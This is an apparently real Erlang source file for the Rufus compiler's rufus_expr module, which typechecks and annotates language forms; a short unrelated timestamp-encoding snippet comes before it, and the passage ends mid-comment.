-spec encode_timestamp(influx:timestamp()) -> iodata().
encode_timestamp(Timestamp) ->
  erlang:integer_to_binary(Timestamp).
%% rufus_expr annotates forms with type information and performs typechecks to
%% ensure correctness.
-module(rufus_expr).
-include_lib("rufus_type.hrl").
%% API exports
-export([typecheck_and_annotate/1]).
%% API
%% typecheck_and_annotate iterates over RufusForms and adds type information
%% from the current scope to each form. Iteration stops at the first error.
%% Return values:
%% - `{ok, AnnotatedForms}` if no issues are found.
%% - `{error, unknown_func, Data}` with `Data` containing a `spec` key that has
%% the function name.
%% - `{error, incorrect_arg_count, Data}` with `Data` containing `actual` and
%% `expected` atom keys pointing to the number of args received and the number
%% of args expected, respectively
%% - `{error, invalid_arg_type, Data}` with `Data` containing `actual` and
%% `expected` atom keys pointing to Rufus types if return value types are
%% unmatched.
-spec typecheck_and_annotate(rufus_forms()) -> {ok, rufus_forms()} | error_triple().
typecheck_and_annotate(RufusForms) ->
    Acc = [],
    Stack = [],
    Locals = #{},
    try
        %% First pass: annotate module-level functions so calls can be
        %% resolved against the resulting Globals map.
        {ok, Globals, AnnotatedForms1} = typecheck_and_annotate_globals(Acc, Stack, RufusForms),
        %% Second pass: typecheck every form with the globals in scope.
        {ok, _Locals, AnnotatedForms2} = typecheck_and_annotate(
            Acc,
            Stack,
            Globals,
            Locals,
            AnnotatedForms1
        ),
        %% Guard against any form escaping annotation before declaring
        %% success.
        ok = rufus_forms:each(AnnotatedForms2, fun safety_check/1),
        {ok, AnnotatedForms2}
    catch
        %% The typecheck helpers signal the first failure by throwing an
        %% {error, Code, Data} triple, which is returned to the caller.
        {error, Code, Data} ->
            {error, Code, Data}
    end.
%% Private API
%% safety_check ensures that every form carries type information. func
%% and module forms are exempt. Returns `ok', or throws an `{error,
%% safety_check, Data}' triple for any other form without a type key.
-spec safety_check(rufus_form()) -> ok | no_return().
safety_check({func, _Context}) ->
    ok;
safety_check({module, _Context}) ->
    ok;
safety_check({_FormType, #{type := _TypeForm}}) ->
    ok;
safety_check(Form) ->
    throw({error, safety_check, #{form => Form, error => missing_type_information}}).
%% typecheck_and_annotate_globals iterates over RufusForms and adds type
%% information to all module-level functions. An `{error, Reason, Data}` error
%% triple is thrown at the first error.
-spec typecheck_and_annotate_globals(rufus_forms(), rufus_stack(), rufus_forms()) ->
    {ok, globals(), rufus_forms()}.
typecheck_and_annotate_globals(Acc, Stack, [Form = {func, _Context} | T]) ->
    {ok, AnnotatedForm} = typecheck_and_annotate_func_params(Stack, Form),
    typecheck_and_annotate_globals([AnnotatedForm | Acc], Stack, T);
typecheck_and_annotate_globals(Acc, Stack, [Form = {module, _Context} | T]) ->
    typecheck_and_annotate_globals([Form | Acc], Stack, T);
typecheck_and_annotate_globals(Acc, _Stack, []) ->
    %% Restore source order before computing the Globals map.
    Forms = lists:reverse(Acc),
    {ok, Globals} = rufus_forms:globals(Forms),
    {ok, Globals, Forms}.
%% typecheck_and_annotate iterates over RufusForms and adds type information
%% from the current scope to each form. An `{error, Reason, Data}` error triple
%% is thrown at the first error.
%% Each clause dispatches on the form kind to a dedicated helper; Locals
%% is threaded through so binding forms (params, match ops, cons, lists)
%% can extend the scope seen by later forms.
-spec typecheck_and_annotate(rufus_forms(), rufus_stack(), globals(), locals(), rufus_forms()) ->
    {ok, locals(), rufus_forms()}.
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {binary_op, _Context} | T]) ->
    {ok, AnnotatedForm} = typecheck_and_annotate_binary_op(Stack, Globals, Locals, Form),
    typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, Locals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {call, _Context} | T]) ->
    {ok, AnnotatedForm} = typecheck_and_annotate_call(Stack, Globals, Locals, Form),
    typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, Locals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {'case', _Context} | T]) ->
    {ok, AnnotatedForm} = typecheck_and_annotate_case(Stack, Globals, Locals, Form),
    typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, Locals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {case_clause, _Context} | T]) ->
    {ok, AnnotatedForm} = typecheck_and_annotate_case_clause(Stack, Globals, Locals, Form),
    typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, Locals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {catch_clause, _Context} | T]) ->
    {ok, AnnotatedForm} = typecheck_and_annotate_catch_clause(Stack, Globals, Locals, Form),
    typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, Locals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {cons, _Context} | T]) ->
    {ok, NewLocals, AnnotatedForm} = typecheck_and_annotate_cons(Stack, Globals, Locals, Form),
    typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, NewLocals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {func, _Context} | T]) ->
    {ok, AnnotatedForm} = typecheck_and_annotate_func(Stack, Globals, Locals, Form),
    typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, Locals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {identifier, _Context} | T]) ->
    {ok, NewLocals, AnnotatedForm} = typecheck_and_annotate_identifier(
        Stack,
        Globals,
        Locals,
        Form
    ),
    typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, NewLocals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {list_lit, _Context} | T]) ->
    {ok, NewLocals, AnnotatedForm} = typecheck_and_annotate_list_lit(Stack, Globals, Locals, Form),
    typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, NewLocals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {match_op, _Context} | T]) ->
    {ok, NewLocals, AnnotatedForm} = typecheck_and_annotate_match_op(Stack, Globals, Locals, Form),
    typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, NewLocals, T);
%% Parameters carry their own type; they only need to be registered as
%% local bindings for the forms that follow.
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {param, _Context} | T]) ->
    {ok, NewLocals} = push_local(Locals, Form),
    typecheck_and_annotate([Form | Acc], Stack, Globals, NewLocals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {throw, _Context} | T]) ->
    {ok, NewLocals, AnnotatedForm} = typecheck_and_annotate_throw(Stack, Globals, Locals, Form),
    typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, NewLocals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {try_catch_after, _Context} | T]) ->
    {ok, NewLocals, AnnotatedForm} = typecheck_and_annotate_try_catch_after(
        Stack,
        Globals,
        Locals,
        Form
    ),
    typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, NewLocals, T);
%% Any other form kind passes through unchanged.
typecheck_and_annotate(Acc, Stack, Globals, Locals, [H | T]) ->
    typecheck_and_annotate([H | Acc], Stack, Globals, Locals, T);
typecheck_and_annotate(Acc, _Stack, _Globals, Locals, []) ->
    {ok, Locals, lists:reverse(Acc)}.
%% binary_op form helpers

%% typecheck_and_annotate_binary_op ensures that binary_op operands are
%% exclusively ints or exclusively floats. Inferred type information is added to
%% every `binary_op` form. Return values:
%% - `{ok, AnnotatedForms}` if no issues are found. Every `binary_op` form is
%%   annotated with type information.
%% - `{error, unmatched_operand_type, Form}` is thrown if an `int` operand is
%%   mixed with a `float` operand. `Form` contains the illegal operands.
%% - `{error, unsupported_operand_type, Form}` is thrown if a type other than an
%%   int is used as an operand. `Form` contains the illegal operands.
-spec typecheck_and_annotate_binary_op(rufus_stack(), globals(), locals(), binary_op_form()) ->
    {ok, binary_op_form()} | no_return().
typecheck_and_annotate_binary_op(
    Stack,
    Globals,
    Locals,
    Form = {binary_op, Context = #{left := Left, right := Right}}
) ->
    %% Each operand is checked with a stack marker recording which side
    %% of the binary_op it sits on.
    BinaryOpStack = [Form | Stack],
    LeftStack = [rufus_form:make_binary_op_left(Form) | BinaryOpStack],
    %% Matching the already-bound Locals asserts that typechecking an
    %% operand does not introduce new local bindings.
    {ok, Locals, [AnnotatedLeft]} = typecheck_and_annotate([], LeftStack, Globals, Locals, [Left]),
    RightStack = [rufus_form:make_binary_op_right(Form) | BinaryOpStack],
    {ok, Locals, [AnnotatedRight]} = typecheck_and_annotate([], RightStack, Globals, Locals, [Right]),
    Context1 = Context#{left => AnnotatedLeft, right => AnnotatedRight},
    AnnotatedForm1 = {binary_op, Context1#{locals => Locals}},
    case rufus_type:resolve(Globals, AnnotatedForm1) of
        {ok, TypeForm} ->
            AnnotatedForm2 = {binary_op, Context1#{type => TypeForm}},
            {ok, AnnotatedForm2};
        Error ->
            throw(Error)
    end.
%% call form helpers

%% typecheck_and_annotate_call resolves the return type for a function call and
%% returns a call form annotated with type information.
-spec typecheck_and_annotate_call(rufus_stack(), globals(), locals(), call_form()) ->
    {ok, call_form()} | no_return().
typecheck_and_annotate_call(
    Stack,
    Globals,
    Locals,
    {call, Context = #{args := Args, spec := Spec}}
) ->
    %% Arguments are typechecked first; any bindings they create are not
    %% propagated past the call form.
    {ok, _NewLocals, AnnotatedArgs} = typecheck_and_annotate([], Stack, Globals, Locals, Args),
    Context1 = Context#{args => AnnotatedArgs},
    Context2 =
        case maps:get(Spec, Locals, undefined) of
            undefined ->
                Context1;
            [_Type] ->
                %% The identifier being invoked refers to a function defined in
                %% the local scope, which means it must be an anonymous
                %% function. We mark the form so that rufus_erlang:forms/1 can
                %% generate the correct Erlang abstract syntax to match the use
                %% case of calling a named function vs. an anonymous function.
                Context1#{kind => anonymous}
        end,
    Form = {call, Context2#{locals => Locals}},
    case rufus_type:resolve(Globals, Form) of
        {ok, TypeForm} ->
            AnnotatedForm = {call, Context2#{type => TypeForm}},
            {ok, AnnotatedForm};
        Error ->
            throw(Error)
    end.
%% case form helpers

%% typecheck_and_annotate_case typechecks a case expression: the match
%% expression is annotated first, the case form is pushed onto the stack
%% so clauses can compare against the match expression's type, every
%% clause is typechecked, clause return types are checked for agreement,
%% and finally the overall type of the case expression is resolved.
%% TODO(jkakar) Figure out why Dialyzer doesn't like this spec:
%% -spec typecheck_and_annotate_case(rufus_stack(), globals(), locals(), case_form()) ->
%%     {ok, locals(), case_form()} | no_return().
typecheck_and_annotate_case(
    Stack,
    Globals,
    Locals,
    {'case', Context = #{match_expr := MatchExpr, clauses := Clauses}}
) ->
    {ok, NewLocals, [AnnotatedMatchExpr]} = typecheck_and_annotate(
        [],
        Stack,
        Globals,
        Locals,
        [MatchExpr]
    ),
    AnnotatedForm1 = {'case', Context#{match_expr => AnnotatedMatchExpr}},
    %% Clauses see the annotated case form on the stack so their match
    %% expressions can be checked against the case value type.
    CaseStack = [AnnotatedForm1 | Stack],
    {ok, _, AnnotatedClauses} = typecheck_and_annotate(
        [], CaseStack, Globals, NewLocals, Clauses
    ),
    ok = typecheck_case_clause_return_types(AnnotatedClauses),
    AnnotatedForm2 =
        {'case', Context#{
            match_expr => AnnotatedMatchExpr,
            clauses => AnnotatedClauses
        }},
    case rufus_type:resolve(Stack, Globals, AnnotatedForm2) of
        {ok, TypeForm} ->
            AnnotatedForm3 =
                {'case', Context#{
                    match_expr => AnnotatedMatchExpr,
                    clauses => AnnotatedClauses,
                    type => TypeForm
                }},
            {ok, AnnotatedForm3};
        Error ->
            throw(Error)
    end.
%% typecheck_and_annotate_case_clause typechecks one clause of a case
%% expression. The first clause handles pattern clauses: the clause's
%% match expression is checked for compatibility with the case value
%% type, then the clause body is typechecked with any bindings the
%% pattern introduced. The second clause handles default clauses that
%% have no match expression.
-spec typecheck_and_annotate_case_clause(
    rufus_stack(),
    globals(),
    locals(),
    case_clause_form()
) -> {ok, case_clause_form()} | no_return().
typecheck_and_annotate_case_clause(
    Stack,
    Globals,
    Locals,
    Form = {case_clause, Context = #{match_expr := MatchExpr, exprs := Exprs}}
) ->
    CaseClauseStack = [Form | Stack],
    {ok, NewLocals, [AnnotatedMatchExpr]} = typecheck_and_annotate(
        [],
        CaseClauseStack,
        Globals,
        Locals,
        [MatchExpr]
    ),
    %% Reject clause patterns whose type disagrees with the case value.
    ok = typecheck_case_clause_match_expr(Stack, AnnotatedMatchExpr),
    {ok, _, AnnotatedExprs} = typecheck_and_annotate([], Stack, Globals, NewLocals, Exprs),
    AnnotatedForm1 =
        {case_clause, Context#{
            match_expr => AnnotatedMatchExpr,
            exprs => AnnotatedExprs
        }},
    case rufus_type:resolve(Stack, Globals, AnnotatedForm1) of
        {ok, TypeForm} ->
            AnnotatedForm2 =
                {case_clause, Context#{
                    match_expr => AnnotatedMatchExpr,
                    exprs => AnnotatedExprs,
                    type => TypeForm
                }},
            {ok, AnnotatedForm2};
        Error ->
            throw(Error)
    end;
typecheck_and_annotate_case_clause(
    Stack,
    Globals,
    Locals,
    {case_clause, Context = #{exprs := Exprs}}
) ->
    {ok, _, AnnotatedExprs} = typecheck_and_annotate([], Stack, Globals, Locals, Exprs),
    AnnotatedForm1 =
        {case_clause, Context#{
            exprs => AnnotatedExprs
        }},
    case rufus_type:resolve(Stack, Globals, AnnotatedForm1) of
        {ok, TypeForm} ->
            AnnotatedForm2 =
                {case_clause, Context#{
                    exprs => AnnotatedExprs,
                    type => TypeForm
                }},
            {ok, AnnotatedForm2};
        Error ->
            throw(Error)
    end.
%% typecheck_case_clause_match_expr ensures that a clause's match expression
%% has the same type as the value matched by the enclosing case expression.
%% The head of Stack must be the enclosing case form. Returns ok on success;
%% throws {error, unmatched_case_clause_type, Data} when the types differ.
-spec typecheck_case_clause_match_expr(rufus_stack(), rufus_form()) -> ok | no_return().
typecheck_case_clause_match_expr(
    Stack = [{'case', #{match_expr := CaseMatchExpr}} | _T], MatchExpr
) ->
    Expected = rufus_form:type_spec(CaseMatchExpr),
    Actual = rufus_form:type_spec(MatchExpr),
    case Expected =:= Actual of
        true ->
            ok;
        false ->
            throw(
                {error, unmatched_case_clause_type, #{
                    stack => Stack,
                    match_expr => MatchExpr,
                    actual => Actual,
                    expected => Expected
                }}
            )
    end.
%% typecheck_case_clause_return_types ensures that all case clause blocks have
%% the same return type. Clauses whose type kind is `throw` never return and
%% are therefore exempt from the check. Returns ok on success; otherwise an
%% {error, mismatched_case_clause_return_type, Data} triple is thrown by
%% validate_case_clause_return_type/2.
-spec typecheck_case_clause_return_types(list(case_clause_form())) -> ok | no_return().
typecheck_case_clause_return_types(CaseClauses) ->
    %% Pair every clause with its type form and drop throwing clauses in a
    %% single, order-preserving pass (replaces a map + foldr combination).
    FormPairs = lists:filtermap(
        fun(CaseClauseForm) ->
            case rufus_form:type(CaseClauseForm) of
                {type, #{kind := throw}} ->
                    false;
                TypeForm ->
                    {true, {CaseClauseForm, TypeForm}}
            end
        end,
        CaseClauses
    ),
    validate_case_clause_return_type([], FormPairs).
%% validate_case_clause_return_type iterates over {Form, TypeForm} 2-tuples and
%% returns ok if the types of all pairs match, or throws an {error,
%% mismatched_case_clause_return_type, Data} 3-tuple. The first argument is an
%% accumulator: [] until the first pair is seen, then a single-element list
%% holding the type spec that every remaining pair must match.
%% -spec validate_case_clause_return_type(list(atom()), list({rufus_form(), type_form()})) ->
%%     ok | no_return().
validate_case_clause_return_type([Spec], [{_Form, {type, #{spec := Spec}}} | T]) ->
    %% The pair's type spec matches the expected one; keep going.
    validate_case_clause_return_type([Spec], T);
validate_case_clause_return_type([], [{_Form, {type, #{spec := Spec}}} | T]) ->
    %% First pair seen: its type spec becomes the expected one.
    validate_case_clause_return_type([Spec], T);
validate_case_clause_return_type([ExpectedSpec], [{Form, {type, #{spec := ActualSpec}}} | _T]) ->
    %% Mismatch: report the offending form with expected/actual specs.
    Data = #{
        form => Form,
        actual => ActualSpec,
        expected => ExpectedSpec
    },
    throw({error, mismatched_case_clause_return_type, Data});
validate_case_clause_return_type(_, []) ->
    ok.
%% cons form helpers

%% typecheck_and_annotate_cons enforces the constraint that the head and tail
%% elements are of the expected type. Return values:
%% - `{ok, Locals, AnnotatedForm}` if no issues are found.
%% - `{error, unexpected_element_type, Data}` is thrown if either the head or
%%   tail elements have type issues.
-spec typecheck_and_annotate_cons(rufus_stack(), globals(), locals(), cons_form()) ->
    {ok, locals(), cons_form()} | no_return().
typecheck_and_annotate_cons(
    Stack,
    Globals,
    Locals,
    Form = {cons, Context = #{head := Head, tail := Tail}}
) ->
    %% Marker forms are pushed onto the stack so nested typechecks can tell
    %% whether they're inside the head or the tail of the cons.
    ConsStack = [Form | Stack],
    HeadStack = [rufus_form:make_cons_head(Form) | ConsStack],
    {ok, NewLocals1, [AnnotatedHead]} = typecheck_and_annotate([], HeadStack, Globals, Locals, [
        Head
    ]),
    %% The head is typechecked before the tail; locals bound in the head
    %% (NewLocals1) are visible while typechecking the tail.
    TailStack = [rufus_form:make_cons_tail(Form) | ConsStack],
    {ok, NewLocals2, [AnnotatedTail]} = typecheck_and_annotate(
        [],
        TailStack,
        Globals,
        NewLocals1,
        [
            Tail
        ]
    ),
    AnnotatedForm1 = {cons, Context#{head => AnnotatedHead, tail => AnnotatedTail}},
    %% Note: cons resolution uses rufus_type:resolve/2 (without the stack),
    %% unlike most other forms in this module.
    case rufus_type:resolve(Globals, AnnotatedForm1) of
        {ok, TypeForm} ->
            AnnotatedForm2 =
                {cons, Context#{
                    head => AnnotatedHead,
                    tail => AnnotatedTail,
                    type => TypeForm
                }},
            {ok, NewLocals2, AnnotatedForm2};
        Error ->
            throw(Error)
    end.
%% func form helpers

%% typecheck_and_annotate_func_params resolves and annotates types for each parameter
%% in a function parameter list to ensure they satisfy type constraints, and
%% annotates the func form with its composite func type.
-spec typecheck_and_annotate_func_params(rufus_stack(), func_form()) ->
    {ok, func_form()} | no_return().
typecheck_and_annotate_func_params(
    Stack,
    Form =
        {func,
            Context = #{
                params := Params,
                exprs := Exprs,
                return_type := ReturnType,
                line := Line
            }}
) ->
    FuncStack = [Form | Stack],
    ParamsStack = [rufus_form:make_func_params(Form) | FuncStack],
    %% Parameters are typechecked against empty global and local scopes
    %% (both passed as #{} here).
    {ok, Locals, AnnotatedParams} = typecheck_and_annotate(
        [],
        ParamsStack,
        #{},
        #{},
        Params
    ),
    %% Build the function's own type from its parameter types and declared
    %% return type.
    ParamTypes = lists:map(fun(ParamForm) -> rufus_form:type(ParamForm) end, AnnotatedParams),
    FuncType = rufus_form:make_type(func, ParamTypes, ReturnType, Line),
    %% Local symbols from the parameter list are captured and stored on the
    %% annotated func form. They're used during the second pass when the
    %% function body is typechecked (see typecheck_and_annotate_func/4).
    AnnotatedForm =
        {func, Context#{
            params => AnnotatedParams,
            exprs => Exprs,
            type => FuncType,
            locals => Locals
        }},
    {ok, AnnotatedForm}.
%% typecheck_and_annotate_func adds all parameters to the local scope. It also
%% resolves and annotates types for all expressions in the function body to
%% ensure they satisfy type constraints. The first clause handles module-level
%% functions (which carry a `locals` key produced by
%% typecheck_and_annotate_func_params/2); the second handles anonymous
%% functions, which don't.
-spec typecheck_and_annotate_func(rufus_stack(), globals(), locals(), func_form()) ->
    {ok, func_form()} | no_return().
typecheck_and_annotate_func(
    Stack,
    Globals,
    Locals1,
    Form =
        {func,
            Context1 = #{
                exprs := Exprs,
                locals := Locals2
            }}
) ->
    %% This version of the function is only called for module-level functions,
    %% which have locals in their context.
    Locals3 = maps:merge(Locals1, Locals2),
    FuncStack = [Form | Stack],
    ExprsStack = [rufus_form:make_func_exprs(Form) | FuncStack],
    %% Bindings created inside the body (_NewLocals2) do not leak out.
    {ok, _NewLocals2, AnnotatedExprs} = typecheck_and_annotate(
        [],
        ExprsStack,
        Globals,
        Locals3,
        Exprs
    ),
    %% The temporary `locals` key is removed from the context before the
    %% annotated form is returned.
    Context2 = maps:remove(locals, Context1),
    AnnotatedForm =
        {func, Context2#{
            exprs => AnnotatedExprs
        }},
    %% The type of the last body expression must match the declared return
    %% type.
    ok = typecheck_func_return_type(Globals, AnnotatedForm),
    {ok, AnnotatedForm};
typecheck_and_annotate_func(
    Stack,
    Globals,
    Locals,
    Form =
        {func,
            Context = #{
                params := Params,
                return_type := ReturnType,
                exprs := Exprs,
                line := Line
            }}
) ->
    %% This version of the function is only called for anonymous functions,
    %% which don't have locals in their context.
    FuncStack = [Form | Stack],
    ParamsStack = [rufus_form:make_func_params(Form) | FuncStack],
    %% Unlike module-level functions, the parameters are typechecked here,
    %% inheriting the enclosing scope's Globals and Locals.
    {ok, NewLocals1, AnnotatedParams} = typecheck_and_annotate(
        [],
        ParamsStack,
        Globals,
        Locals,
        Params
    ),
    ParamTypes = lists:map(fun(ParamForm) -> rufus_form:type(ParamForm) end, AnnotatedParams),
    FuncType = rufus_form:make_type(func, ParamTypes, ReturnType, Line),
    ExprsStack = [rufus_form:make_func_exprs(Form) | FuncStack],
    {ok, _NewLocals2, AnnotatedExprs} = typecheck_and_annotate(
        [],
        ExprsStack,
        Globals,
        NewLocals1,
        Exprs
    ),
    AnnotatedForm =
        {func, Context#{
            params => AnnotatedParams,
            exprs => AnnotatedExprs,
            type => FuncType
        }},
    ok = typecheck_func_return_type(Globals, AnnotatedForm),
    {ok, AnnotatedForm}.
%% typecheck_func_return_type enforces the constraint that the type of the
%% final expression in a function matches the function's declared return
%% type. A final expression that throws is accepted regardless of the
%% declared type. Returns `ok` when the check passes, otherwise throws an
%% `{error, unmatched_return_type, Data}` error triple (or the error returned
%% by rufus_type:resolve/2).
-spec typecheck_func_return_type(globals(), func_form()) -> ok | no_return().
typecheck_func_return_type(Globals, {func, #{return_type := ReturnType, exprs := Exprs}}) ->
    LastExpr = lists:last(Exprs),
    case rufus_type:resolve(Globals, LastExpr) of
        {ok, {type, #{spec := ActualSpec}}} ->
            {type, #{spec := ExpectedSpec}} = ReturnType,
            %% A throwing final expression satisfies any declared return type.
            ReturnTypeSatisfied =
                ExpectedSpec == ActualSpec orelse
                    rufus_form:type_kind(LastExpr) == throw,
            case ReturnTypeSatisfied of
                true ->
                    ok;
                false ->
                    throw(
                        {error, unmatched_return_type, #{
                            globals => Globals,
                            return_type => ReturnType,
                            expr => LastExpr,
                            actual => ActualSpec,
                            expected => ExpectedSpec
                        }}
                    )
            end;
        Error ->
            throw(Error)
    end.
%% identifier form helpers

%% typecheck_and_annotate_identifier adds a locals key/value pair to the
%% identifier with information about local variables that are in scope. Type
%% information is also added to the identifier form if present in Locals.
%% Locals maps an identifier spec to a single-element list holding its type
%% form (see push_local/2). Return values:
%% - `{ok, Locals, AnnotatedForm}` with locals and type information.
-spec typecheck_and_annotate_identifier(rufus_stack(), globals(), locals(), identifier_form()) ->
    {ok, locals(), identifier_form()}.
typecheck_and_annotate_identifier(
    Stack,
    Globals,
    Locals,
    Form = {identifier, Context1 = #{spec := Spec}}
) ->
    {ok, AnnotatedForm1} = annotate_locals(Locals, Form),
    case maps:get(Spec, Locals, undefined) of
        undefined ->
            %% Unbound identifier: infer its type from the surrounding stack
            %% and record the new binding in the local scope.
            case rufus_type:resolve(Stack, Globals, AnnotatedForm1) of
                {ok, TypeForm} ->
                    {identifier, Context2} = AnnotatedForm1,
                    AnnotatedForm2 = {identifier, Context2#{type => TypeForm}},
                    {ok, NewLocals} = push_local(Locals, AnnotatedForm2),
                    {ok, NewLocals, AnnotatedForm2};
                {error, Reason, Data} ->
                    throw({error, Reason, Data})
            end;
        [TypeForm] ->
            %% Already bound: annotate with the known type. Note that this
            %% branch builds on Context1, i.e. without the locals annotation
            %% added above — presumably intentional; confirm.
            AnnotatedForm2 = {identifier, Context1#{type => TypeForm}},
            {ok, Locals, AnnotatedForm2}
    end.
%% list_lit form helpers

%% typecheck_and_annotate_list_lit enforces the constraint that each list
%% element matches the collection type. Return values:
%% - `{ok, Locals, AnnotatedForm}` if no issues are found. The list_lit form
%%   and its elements are annotated with type information.
%% - `{error, unexpected_element_type, Data}` is thrown if an element is found
%%   with a differing type.
-spec typecheck_and_annotate_list_lit(rufus_stack(), globals(), locals(), list_lit_form()) ->
    {ok, locals(), list_lit_form()} | no_return().
typecheck_and_annotate_list_lit(
    Stack,
    Globals,
    Locals,
    Form = {list_lit, Context = #{elements := Elements}}
) ->
    {ok, NewLocals, AnnotatedElements} = typecheck_and_annotate(
        [],
        [Form | Stack],
        Globals,
        Locals,
        Elements
    ),
    AnnotatedContext = Context#{elements => AnnotatedElements},
    %% Note: list_lit resolution uses rufus_type:resolve/2 (no stack).
    case rufus_type:resolve(Globals, {list_lit, AnnotatedContext}) of
        {ok, TypeForm} ->
            {ok, NewLocals, {list_lit, AnnotatedContext#{type => TypeForm}}};
        Error ->
            throw(Error)
    end.
%% match_op form helpers

%% typecheck_and_annotate_match_op ensures that match_op operands have matching
%% types. Unknown identifiers in the left operand are treated as unbound
%% variables and their type information is inferred from the right operand.
%% Return values:
%% - `{ok, Locals, AnnotatedForm}` if no issues are found. The match_op form and
%%   its operands are annotated with type information.
%% - `{error, unknown_identifier, Data}` is thrown if the right operand is
%%   unbound.
%% - `{error, unmatched_types, Data}` is thrown when the left and right operand
%%   have differing types.
-spec typecheck_and_annotate_match_op(rufus_stack(), globals(), locals(), match_op_form()) ->
    {ok, locals(), match_op_form()} | no_return().
typecheck_and_annotate_match_op(
    Stack,
    Globals,
    Locals,
    Form = {match_op, Context = #{left := Left, right := Right}}
) ->
    %% The right operand is typechecked first so that unbound identifiers on
    %% the left can have their types inferred from it. Marker forms are pushed
    %% onto the stack so nested typechecks know which side they're on.
    MatchOpStack1 = [Form | Stack],
    RightStack = [rufus_form:make_match_op_right(Form) | MatchOpStack1],
    {ok, NewLocals1, [AnnotatedRight]} = typecheck_and_annotate(
        [],
        RightStack,
        Globals,
        Locals,
        [Right]
    ),
    %% The left operand sees the partially annotated match_op (with the
    %% annotated right operand) at the head of its stack, plus any locals
    %% bound while typechecking the right operand.
    AnnotatedForm1 = {match_op, Context#{right => AnnotatedRight}},
    MatchOpStack2 = [AnnotatedForm1 | Stack],
    LeftStack = [rufus_form:make_match_op_left(Form) | MatchOpStack2],
    {ok, NewLocals2, [AnnotatedLeft]} = typecheck_and_annotate(
        [],
        LeftStack,
        Globals,
        NewLocals1,
        [Left]
    ),
    case rufus_form:type_spec(AnnotatedLeft) == rufus_form:type_spec(AnnotatedRight) of
        true ->
            %% The match_op takes its type from the right operand; the left
            %% side must also be a legal pattern (see validate_pattern/3).
            AnnotatedForm2 =
                {match_op, Context#{
                    left => AnnotatedLeft,
                    right => AnnotatedRight,
                    type => rufus_form:type(AnnotatedRight)
                }},
            ok = validate_pattern(Globals, NewLocals2, AnnotatedForm2),
            {ok, NewLocals2, AnnotatedForm2};
        false ->
            Data = #{
                globals => Globals,
                locals => Locals,
                left => AnnotatedLeft,
                right => AnnotatedRight
            },
            throw({error, unmatched_types, Data})
    end.
%% validate_pattern checks the left hand side of a pattern match_op expression
%% for valid expressions. An `{error, illegal_pattern, Data}` error triple is
%% thrown if an invalid expression is found.
%%
%% TODO(jkakar) Figure out why Dialyzer doesn't like this spec:
%% -spec validate_pattern(globals(), locals(), match_op_form()) -> ok | no_return().
validate_pattern(Globals, Locals, Form = {match_op, _Context}) ->
    %% The context map travels with the recursion purely for error reporting.
    ErrorData = #{globals => Globals, locals => Locals, form => Form},
    validate_pattern(ErrorData, Form).
%% validate_pattern inspects the left hand operand of a match_op form to ensure
%% that it's a valid pattern. A pattern has the same structure as a term but can
%% contain unbound variables. An `{error, illegal_pattern, Data}` error triple
%% is thrown if the left hand operand contains unsupported expressions.
-spec validate_pattern(context(), rufus_form()) -> ok | no_return().
validate_pattern(Data, {match_op, #{left := Left}}) ->
    %% Nested match: recurse into the left operand.
    validate_pattern(Data, Left);
validate_pattern(Data, Form = {binary_op, _Context}) ->
    %% Arithmetic is only allowed when it folds to a constant at compile time.
    case is_constant_expr(Form) of
        true -> ok;
        false -> throw({error, illegal_pattern, Data})
    end;
validate_pattern(Data, {FormType, _Context}) ->
    %% Literals, cons cells and identifiers (bound or unbound) are valid
    %% patterns; every other form type is rejected.
    ValidFormTypes = [
        atom_lit, bool_lit, float_lit, int_lit, string_lit, list_lit, cons, identifier
    ],
    case lists:member(FormType, ValidFormTypes) of
        true -> ok;
        false -> throw({error, illegal_pattern, Data})
    end;
validate_pattern(Data, _Form) ->
    throw({error, illegal_pattern, Data}).
%% is_constant_expr returns true if a binary_op can be evaluated to a constant
%% during compilation, i.e. when both operands recursively reduce to numeric
%% literals. Otherwise, it returns false.
-spec is_constant_expr(rufus_form()) -> boolean().
is_constant_expr({float_lit, _Context}) ->
    true;
is_constant_expr({int_lit, _Context}) ->
    true;
is_constant_expr({binary_op, #{left := Left, right := Right}}) ->
    is_constant_expr(Left) andalso is_constant_expr(Right);
is_constant_expr(_Form) ->
    false.
%% throw helpers

%% typecheck_and_annotate_throw typechecks the thrown expression and annotates
%% the throw form with its resolved type. Returns {ok, Locals, AnnotatedForm},
%% or throws the error returned by rufus_type:resolve/3.
typecheck_and_annotate_throw(
    Stack,
    Globals,
    Locals,
    {throw, Context = #{expr := Expr}}
) ->
    {ok, NewLocals, [AnnotatedExpr]} = typecheck_and_annotate(
        [], Stack, Globals, Locals, [Expr]
    ),
    AnnotatedContext = Context#{expr => AnnotatedExpr},
    case rufus_type:resolve(Stack, Globals, {throw, AnnotatedContext}) of
        {ok, TypeForm} ->
            {ok, NewLocals, {throw, AnnotatedContext#{type => TypeForm}}};
        Error ->
            throw(Error)
    end.
%% try/catch/after helpers

%% typecheck_and_annotate_try_catch_after ensures that try and catch blocks have
%% a valid sequence of expressions and matching return types. New identifiers in
%% either the try or catch block are not visible in the surrounding scope.
%% Return values:
%% - `{ok, Locals, AnnotatedForm}` if no issues are found. The try_catch_after
